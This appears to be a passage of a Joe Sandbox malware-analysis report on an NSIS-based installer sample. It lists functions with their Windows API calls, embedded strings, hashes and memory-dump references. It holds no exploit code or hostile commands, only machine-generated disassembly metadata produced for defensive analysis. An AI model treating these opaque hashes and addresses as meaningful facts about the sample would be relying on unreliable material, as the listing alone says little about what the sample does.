                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                                                                                                                                                            • String ID: created uninstaller: %d, "%s"
                                                                                                                                                                                                                                                                                            • API String ID: 3294113728-3145124454
                                                                                                                                                                                                                                                                                            • Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                                                                                                                                                                            • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                                                                                                                                                                                                                                                                            Function 004023F0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 83libraryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042B018,771B23A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042B018,771B23A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042B018,771B23A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • `G, xrefs: 0040246E
                                                                                                                                                                                                                                                                                            • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                                                                                                                                                                                                            • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                                                                                                                                                                                                            • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                            • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                                                                                                                                                                                                                                                                            • API String ID: 1033533793-4193110038
                                                                                                                                                                                                                                                                                            • Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                                                                                                                                            • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                                                                                                                                                                                                                                                                            Function 00403DF6 Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                                                                                                                                                                                                                                                            • GetSysColor.USER32(00000000), ref: 00403E2C
                                                                                                                                                                                                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                                                                                                                                                                                                                                                            • SetBkMode.GDI32(?,?), ref: 00403E44
                                                                                                                                                                                                                                                                                            • GetSysColor.USER32(?), ref: 00403E57
                                                                                                                                                                                                                                                                                            • SetBkColor.GDI32(?,?), ref: 00403E67
                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 00403E81
                                                                                                                                                                                                                                                                                            • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2320649405-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                                                                                                                                            • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                                                                                                                                                                                                                                                                            Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042B018,771B23A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042B018,771B23A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042B018,771B23A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                              • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                                                                              • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                                                                                                                                                                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                                                                                                                                                                                                            • Exec: command="%s", xrefs: 00402241
                                                                                                                                                                                                                                                                                            • Exec: success ("%s"), xrefs: 00402263
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                            • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                                                                                                                                                                                                            • API String ID: 2014279497-3433828417
                                                                                                                                                                                                                                                                                            • Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                                                                                                                                            • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                                                                                                                                                                                                                                                                            Function 0040487A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                                                                                                                                                                                                                                                            • GetMessagePos.USER32 ref: 0040489D
                                                                                                                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 004048B5
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                                                                                            • String ID: f
                                                                                                                                                                                                                                                                                            • API String ID: 41195575-1993550816
                                                                                                                                                                                                                                                                                            • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                                                                                                                                            • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                                                                                                                                                                                                                                                                            Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                                                                                                                                                                                                            • MulDiv.KERNEL32(00016000,00000064,000DB817), ref: 00403295
                                                                                                                                                                                                                                                                                            • wsprintfW.USER32 ref: 004032A5
                                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                                                                                                                                                                                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • verifying installer: %d%%, xrefs: 0040329F
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                                                                                            • String ID: verifying installer: %d%%
                                                                                                                                                                                                                                                                                            • API String ID: 1451636040-82062127
                                                                                                                                                                                                                                                                                            • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                                                                                                                                            • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                                                                                                                                                                                                                                                                            Function 00406064 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                            • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                            • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                            • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Char$Next$Prev
                                                                                                                                                                                                                                                                                            • String ID: *?|<>/":
                                                                                                                                                                                                                                                                                            • API String ID: 589700163-165019052
                                                                                                                                                                                                                                                                                            • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                                                                                                                                            • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                                                                                                                                                                                                                                                                            Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(0057E8A0), ref: 00402387
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FreeGloballstrcpyn
                                                                                                                                                                                                                                                                                            • String ID: Exch: stack < %d elements$Pop: stack empty$open
                                                                                                                                                                                                                                                                                            • API String ID: 1459762280-1711415406
                                                                                                                                                                                                                                                                                            • Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                                                                                                                                                                            • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D
                                                                                                                                                                                                                                                                                            Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                                                                                                                                                                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                                                                                                                                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1912718029-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                                                                                                                                            • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                                                                                                                                                                                                                                                                            Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                                                                                                                                                                                                            • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                                                                                                                                                                                                            • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                                                                                                                                                                                                              • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(0057E8A0), ref: 00402387
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
